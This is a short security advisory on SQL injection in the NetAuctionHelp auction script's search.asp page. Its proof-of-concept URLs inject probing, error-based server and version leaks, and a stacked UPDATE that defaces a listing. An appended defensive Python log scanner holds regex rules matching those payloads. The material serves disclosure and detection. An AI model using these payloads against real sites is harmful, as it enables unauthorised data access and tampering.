
NetAuctionHelp SQL Injection



Aria-Security.net: NetAuctionHelp SQL Injection



Aria-Security Net
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1099
------------------------
Vendor: http://www.netauctionhelp.com

PoC:
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=[SQL INJECTION]
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch='having 1=1--

search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@servername)--
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@version)--

tblAd.id
tblAd.aspectratio
tblAd.title
tblAd.imagepath
tblAd.startdate
tblAd.enddate
tblAd.id_seller
tblAd.descr

-1' UPDATE tblAd set descr= 'HACKED' Where(ID= '1');--

This code will update itemdetl.asp?id=1

Credit goes to Aria-Security.Net
Greetz: AurA
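
A defender-side check for the probes listed above, as an added example that is not part of the original advisory: it scans web server logs for requests to search.asp whose nsearch value carries the quoted SQL fragments shown in the PoC. The log field layout, the sample lines, the rule names and the scan function are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed sample log (assumed fields: date time c-ip method uri-stem uri-query status).
SAMPLE_LOG = """\
2024-01-10 10:00:01 192.0.2.10 GET /search.asp sort=ni&category=&kwsearch=&nsearch=antique+clock 200
2024-01-10 10:00:07 192.0.2.44 GET /search.asp sort=ni&category=&kwsearch=&nsearch='having+1=1-- 500
2024-01-10 10:00:09 192.0.2.44 GET /search.asp sort=ni&category=&kwsearch=&nsearch=1'+or+1=convert(int,@@version)-- 500
2024-01-10 10:00:15 192.0.2.44 GET /search.asp sort=ni&category=&kwsearch=&nsearch=-1'+UPDATE+tblAd+set+descr=+'x'+Where(ID=+'1')%3B-- 200
2024-01-10 10:00:20 192.0.2.77 GET /search.asp sort=ni&category=&kwsearch=&nsearch=o'brien+watch 200
"""

# One rule per fragment seen in the advisory's PoC strings (rule names are hypothetical).
RULES = {
    "having-probe": re.compile(r"'\s*having\b", re.I),
    "convert-error": re.compile(r"convert\s*\(\s*int\s*,", re.I),
    "global-variable": re.compile(r"@@\w+"),
    "stacked-update": re.compile(r"\bupdate\s+\w+\s+set\b", re.I),
    "trailing-comment": re.compile(r"--\s*$"),
}

def scan(log_text, param="nsearch"):
    """Return (client_ip, decoded_value, matched_rule_names) for suspicious requests."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7 or fields[0].startswith("#"):
            continue  # skip header/comment lines and short records
        client_ip, stem, query = fields[2], fields[4], fields[5]
        if not stem.lower().endswith("/search.asp"):
            continue
        for value in parse_qs(query).get(param, []):  # parse_qs URL-decodes the value
            if "'" not in value:
                continue  # every PoC string first breaks out of the string literal
            tail = value[value.index("'"):]
            matched = sorted(name for name, rx in RULES.items() if rx.search(tail))
            if matched:  # a lone apostrophe (o'brien) matches no rule and is ignored
                hits.append((client_ip, value, matched))
    return hits

if __name__ == "__main__":
    for ip, value, rules in scan(SAMPLE_LOG):
        print(ip, rules, repr(value))
```

Log matching only shows that probing took place; the fix belongs in search.asp, where nsearch should be bound as a query parameter instead of concatenated into the SQL string.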
